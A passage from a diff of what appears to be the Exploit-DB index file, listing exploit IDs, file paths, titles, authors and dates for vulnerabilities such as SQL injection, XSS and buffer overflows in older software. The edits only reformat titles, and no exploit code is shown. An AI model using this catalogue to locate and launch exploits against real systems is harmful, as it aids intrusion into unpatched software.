fatcat_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 22936,platforms/php/webapps/22936.txt,"SmartCMS - (index.php idx parameter) SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 @@ -20220,7 +20220,7 @@ id,file,description,date,author,platform,type,port 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,Metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-By-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote,0 -23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0 +23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 - Crash PoC",2012-11-29,p3kok,windows,dos,0 22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 - realpath() Off-By-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote,0 22976,platforms/freebsd/remote/22976.pl,"freeBSD 4.8 realpath() Off-By-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 @@ -20229,30 +20229,30 @@ id,file,description,date,author,platform,type,port 22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0 22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0 22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 -22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 Format String",2003-08-04,mcw@wcd.se,hardware,dos,0 +22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,hardware,dos,0 22984,platforms/linux/local/22984.c,"Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow (1)",2003-08-04,V9,linux,local,0 22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,linux,local,0 22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 PHP User Authentication Suite Cross-Site-Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22987,platforms/multiple/dos/22987.pl,"EveryBuddy 0.4.3 Long Message Denial of Service",2003-08-05,"Noam Rathaus",multiple,dos,0 22988,platforms/unix/local/22988.sh,"IBM DB2 db2job File Overwrite",2003-08-05,"Juan Manuel Pascual Escribá",unix,local,0 22989,platforms/unix/local/22989.pl,"IBM DB2 Shared Library Injection",2003-08-05,daniels@legend.co.uk,unix,local,0 -22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 Register.php HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps,0 +22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 - Register.php HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps,0 22991,platforms/hardware/dos/22991.txt,"D-Link DI-704P Long URL Denial of Service",2003-08-06,chris@cr-secure.net,hardware,dos,0 -22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 Error.ASP Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps,0 +22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 - Error.ASP Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps,0 22993,platforms/linux/local/22993.txt,"IPNetSentryX / IPNetMonitorX Unauthorized Network Reconnaissance",2003-07-07,@stake,linux,local,0 -22994,platforms/multiple/remote/22994.txt,"Sun One 5.1_IPlanet 5.0/5.1 Administration Server Directory Traversal",2003-08-08,"Jim Hardisty",multiple,remote,0 -22995,platforms/php/webapps/22995.txt,"C-Cart 1.0 Path Disclosure",2003-08-08,G00db0y,php,webapps,0 +22994,platforms/multiple/remote/22994.txt,"Sun One 5.1_IPlanet 5.0/5.1 - Administration Server Directory Traversal",2003-08-08,"Jim Hardisty",multiple,remote,0 +22995,platforms/php/webapps/22995.txt,"C-Cart 1.0 - Path Disclosure",2003-08-08,G00db0y,php,webapps,0 22996,platforms/linux/local/22996.c,"XPCD 2.0.8 Home Environment Variable Local Buffer Overflow",2003-07-18,r-code,linux,local,0 22997,platforms/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22998,platforms/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22999,platforms/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 USER Memory Corruption",2003-08-08,zerash,windows,dos,0 23000,platforms/php/webapps/23000.txt,"geeeekShop 1.4 - Information Disclosure",2003-08-09,G00db0y,php,webapps,0 -23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 Admin.php Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 +23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - Admin.php Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 Null Password Authentication",2003-08-09,"Buckaroo Banzai",windows,remote,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple XSS POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module PDA_limit Parameter XSS",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 Path Disclosure",2003-08-11,"Zone-h Security Team",php,webapps,0 +23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 - Path Disclosure",2003-08-11,"Zone-h Security Team",php,webapps,0 23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking",2003-08-11,root@networkpenetration.com,windows,remote,0 23020,platforms/php/webapps/23020.txt,"HostAdmin - Path Disclosure",2003-08-12,G00db0y,php,webapps,0 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0 @@ -20268,7 +20268,7 @@ id,file,description,date,author,platform,type,port 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET topic title XSS",2003-08-13,G00db0y,asp,webapps,0 23031,platforms/php/webapps/23031.txt,"silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 23038,platforms/windows/remote/23038.c,"eMule 0.2x Client OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",windows,remote,0 -23039,platforms/php/webapps/23039.txt,"Fusion News 3.3 Unauthorized Account Addition",2003-08-18,DarkKnight,php,webapps,0 +23039,platforms/php/webapps/23039.txt,"Fusion News 3.3 - Unauthorized Account Addition",2003-08-18,DarkKnight,php,webapps,0 23040,platforms/windows/remote/23040.c,"eMule 0.2x AttachToAlreadyKnown Double Free",2003-09-01,"Stefan Esser",windows,remote,0 23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 Password Disclosure",2003-08-19,"cyber talon",windows,local,0 23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos,0 @@ -20335,7 +20335,7 @@ id,file,description,date,author,platform,type,port 23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps,0 23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0 23106,platforms/php/webapps/23106.txt,"SchoolCMS Persistent XSS",2012-12-03,VipVince,php,webapps,0 -23107,platforms/windows/dos/23107.txt,"Opera Web Browser 12.11 Crash PoC",2012-12-03,coolkaveh,windows,dos,0 +23107,platforms/windows/dos/23107.txt,"Opera Web Browser 12.11 - Crash PoC",2012-12-03,coolkaveh,windows,dos,0 23109,platforms/multiple/webapps/23109.txt,"Symantec Messaging Gateway 9.5.3-3 - CSRF",2012-12-03,"Ben Williams",multiple,webapps,0 23110,platforms/linux/webapps/23110.txt,"Symantec Messaging Gateway 9.5.3-3 - Arbitrary File Download",2012-12-03,"Ben Williams",linux,webapps,0 23111,platforms/multiple/webapps/23111.txt,"FirePass SSL VPN Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",multiple,webapps,0 @@ -20385,8 +20385,8 @@ id,file,description,date,author,platform,type,port 23156,platforms/unix/remote/23156.rb,"Tectia SSH USERAUTH Change Request Password Reset",2012-12-05,Metasploit,unix,remote,0 23157,platforms/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote,0 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 -23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 -23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 +23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 +23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 23161,platforms/linux/remote/23161.c,"LSH 1.x - Remote Buffer Overflow (1)",2003-09-19,"Carl Livitt",linux,remote,0 23162,platforms/linux/remote/23162.c,"LSH 1.x - Remote Buffer Overflow (2)",2003-09-19,"m00 security",linux,remote,0 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 @@ -20404,7 +20404,7 @@ id,file,description,date,author,platform,type,port 23175,platforms/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple Fields HTML Injection",2003-09-24,"Bahaa Naamneh",php,webapps,0 23176,platforms/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",multiple,remote,0 23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 - (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 -23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",2012-12-06,Metasploit,multiple,remote,0 +23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution",2012-12-06,Metasploit,multiple,remote,0 23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows MOF Execution",2012-12-06,Metasploit,windows,remote,0 23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",multiple,dos,0 @@ -20413,15 +20413,15 @@ id,file,description,date,author,platform,type,port 23184,platforms/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 Sensitive User Information Storage",2003-09-25,"Phuong Nguyen",windows,webapps,0 23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",windows,remote,0 23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote,0 -23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 Path Disclosure",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0 +23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 - Path Disclosure",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0 23188,platforms/linux/remote/23188.c,"Athttpd 0.4 b Remote GET Request Buffer Overrun",2003-09-25,r-code,linux,remote,0 23189,platforms/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,linux,local,0 23190,platforms/hardware/dos/23190.pl,"SMC Router 1.2x Random UDP Packet Denial of Service",2003-09-26,_6mO_HaCk,hardware,dos,0 23191,platforms/windows/dos/23191.txt,"Savant Web Server 3.1 Page Redirect Denial of Service",2003-09-26,"Phuong Nguyen",windows,dos,0 -23192,platforms/php/webapps/23192.txt,"GuppY 2.4 HTML Injection",2003-09-29,"David Suzanne",php,webapps,0 +23192,platforms/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",php,webapps,0 23193,platforms/php/webapps/23193.txt,"Geeklog 1.3.x - SQL injection",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23194,platforms/php/webapps/23194.txt,"Geeklog 1.3.x - XSS",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 MSG Cross-Site Scripting",2003-09-29,G00db0y,asp,webapps,0 +23195,platforms/asp/webapps/23195.txt,"Alan Ward A-Cart 2.0 - MSG Cross-Site Scripting",2003-09-29,G00db0y,asp,webapps,0 23196,platforms/linux/remote/23196.c,"WebFS 1.x - Long Pathname Buffer Overrun",2003-09-29,jsk,linux,remote,0 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,linux,local,0 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0 @@ -20442,8 +20442,8 @@ id,file,description,date,author,platform,type,port 23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - Blog.Header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 Message.CGI Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",windows,dos,0 -23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",windows,dos,0 -23217,platforms/cgi/webapps/23217.txt,"Divine Content Server 5.0 Error Page Cross-Site Scripting",2003-10-03,valgasu,cgi,webapps,0 +23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 - Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",windows,dos,0 +23217,platforms/cgi/webapps/23217.txt,"Divine Content Server 5.0 - Error Page Cross-Site Scripting",2003-10-03,valgasu,cgi,webapps,0 23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Inclusion",2003-10-04,frog,php,webapps,0 23219,platforms/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,php,webapps,0 23220,platforms/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,php,webapps,0 @@ -20453,16 +20453,16 @@ id,file,description,date,author,platform,type,port 23225,platforms/windows/remote/23225.rb,"Maxthon3 about:history XCS Trusted Zone Code Execution",2012-12-09,Metasploit,windows,remote,0 23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component Command Injection",2012-12-09,Metasploit,unix,remote,0 -23228,platforms/linux/local/23228.c,"SLocate 2.6 User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 +23228,platforms/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 -23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 +23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 23231,platforms/multiple/dos/23231.txt,"Medieval Total War 1.0/1.1 - nickname Denial of Service",2003-10-07,"Luigi Auriemma",multiple,dos,0 23232,platforms/php/webapps/23232.txt,"PayPal Store Front 3.0 - 'index.php' Remote File Inclusion",2003-10-08,"Zone-h Security Team",php,webapps,0 23233,platforms/php/webapps/23233.txt,"GeekLog 1.3.x - HTML Injection",2003-10-08,Jelmer,php,webapps,0 23234,platforms/windows/dos/23234.c,"Centrinity FirstClass 5.50/5.77/7.0/7.1 - HTTP Server Long Version Field Denial of Service",2003-10-08,I2S-LaB,windows,dos,0 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos,0 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0 -23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 +23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 - admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 23238,platforms/php/webapps/23238.txt,"Gallery 1.4 - index.php Remote File Inclusion",2003-10-11,peter,php,webapps,0 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0 23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0 @@ -20471,7 +20471,7 @@ id,file,description,date,author,platform,type,port 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting",2003-10-14,Ezhilan,php,webapps,0 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0 -23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0 +23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun",2003-10-25,Adik,windows,remote,0 23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,android,dos,0 23249,platforms/php/webapps/23249.txt,"MyBB KingChat Plugin - Persistent XSS",2012-12-09,VipVince,php,webapps,0 @@ -20498,7 +20498,7 @@ id,file,description,date,author,platform,type,port 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps,0 23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access Weakness",2003-10-21,"Marc Schoenefeld",windows,remote,0 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0 -23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 Error Message Information Disclosure",2003-10-22,"Jon Hart",solaris,remote,0 +23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 - Error Message Information Disclosure",2003-10-22,"Jon Hart",solaris,remote,0 23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 Scrollbar-Base-Color Partial Denial of Service",2003-10-22,"Andreas Boeckler",windows,dos,0 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos,0 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x - Denied URL Cross-Site Scripting",2003-10-22,"Richard Maudsley",cgi,webapps,0 @@ -20506,8 +20506,8 @@ id,file,description,date,author,platform,type,port 23387,platforms/windows/remote/23387.txt,"netserve Web server 1.0.7 - Directory Traversal",2003-11-17,nimber@designer.ru,windows,remote,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/DOS",2003-11-19,3APA3A,windows,dos,0 23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 -23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 -23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 +23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 +23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash PoC",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23282,platforms/multiple/remote/23282.txt,"apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",multiple,remote,0 23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 - Local Resource Reference",2003-10-24,Mindwarper,windows,remote,0 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0 @@ -20542,17 +20542,17 @@ id,file,description,date,author,platform,type,port 23312,platforms/cgi/remote/23312.txt,"BEA Tuxedo 6/7/8 and WebLogic Enterprise 4/5 Input Validation",2003-10-30,"Corsaire Limited",cgi,remote,0 23315,platforms/jsp/webapps/23315.txt,"BEA WebLogic 6/7/8 InteractiveQuery.jsp Cross-Site Scripting",2003-10-31,"Corsaire Limited",jsp,webapps,0 23316,platforms/windows/remote/23316.txt,"Citrix Metaframe XP - Cross-Site Scripting",2003-10-31,"Andy Davis",windows,remote,0 -23317,platforms/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 Unauthorized Administrative Access",2003-10-31,slaizer,hardware,remote,0 +23317,platforms/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 - Unauthorized Administrative Access",2003-10-31,slaizer,hardware,remote,0 23318,platforms/windows/remote/23318.txt,"Ashley Brown iWeb Server Encoded Backslash Directory Traversal",2003-10-31,cr-secure.net,windows,remote,0 -23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 Unauthorized Access",2003-10-31,"Virginity Security",php,webapps,0 +23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 - Unauthorized Access",2003-10-31,"Virginity Security",php,webapps,0 23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 - Web Interface Error Message Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0 23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6-10 Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0 23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0 23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution (0Day)",2012-12-12,Abysssec,windows,remote,0 -23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 Path Traversal",2012-12-12,"Sebastian Perez",windows,webapps,0 +23324,platforms/windows/webapps/23324.txt,"Axway Secure Transport 5.1 SP2 - Path Traversal",2012-12-12,"Sebastian Perez",windows,webapps,0 23325,platforms/multiple/dos/23325.c,"BRS WebWeaver 1.06 httpd - 'User-Agent' Remote Denial of Service",2003-11-01,D4rkGr3y,multiple,dos,0 23326,platforms/asp/webapps/23326.txt,"http commander 4.0 - Directory Traversal",2003-11-01,"Zero X",asp,webapps,0 -23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 Unauthorized Access",2003-11-01,t4rku5,windows,local,0 +23327,platforms/windows/local/23327.txt,"DATEV Nutzungskontrolle 2.1/2.2 - Unauthorized Access",2003-11-01,t4rku5,windows,local,0 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0 23330,platforms/php/webapps/23330.txt,"Synthetic Reality SymPoll 1.5 - Cross-Site Scripting",2003-11-03,"Michael Frame",php,webapps,0 @@ -20586,7 +20586,7 @@ id,file,description,date,author,platform,type,port 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 -23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) - SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 +23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin - (newreply.php) SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,Metasploit,linux,remote,0 23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0 @@ -20595,11 +20595,11 @@ id,file,description,date,author,platform,type,port 23365,platforms/windows/remote/23365.txt,"telcondex simplewebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote,0 23366,platforms/linux/remote/23366.c,"Epic 1.0.1/1.0.x - CTCP Nickname Server Message Buffer Overrun",2003-11-10,Li0n7,linux,remote,0 23367,platforms/cgi/webapps/23367.txt,"OnlineArts DailyDose 1.1 - DoSe.pl Remote Command Execution",2003-11-10,Don_Huan,cgi,webapps,0 -23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow (1)",2003-11-10,demz,linux,remote,0 -23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 Command Line Argument Buffer Overflow (2)",2003-11-10,Li0n7,linux,remote,0 +23368,platforms/linux/remote/23368.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (1)",2003-11-10,demz,linux,remote,0 +23369,platforms/linux/remote/23369.c,"Winace UnAce 2.2 - Command Line Argument Buffer Overflow (2)",2003-11-10,Li0n7,linux,remote,0 23370,platforms/cgi/webapps/23370.txt,"ncube server manager 1.0 - Directory Traversal",2003-11-10,"Beck Mr.R",cgi,webapps,0 23371,platforms/linux/remote/23371.c,"Hylafax 4.1.x - HFaxD Unspecified Format String",2003-11-10,"Sebastian Krahmer",linux,remote,0 -23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0 +23372,platforms/php/webapps/23372.txt,"PHP-Coolfile 1.4 - 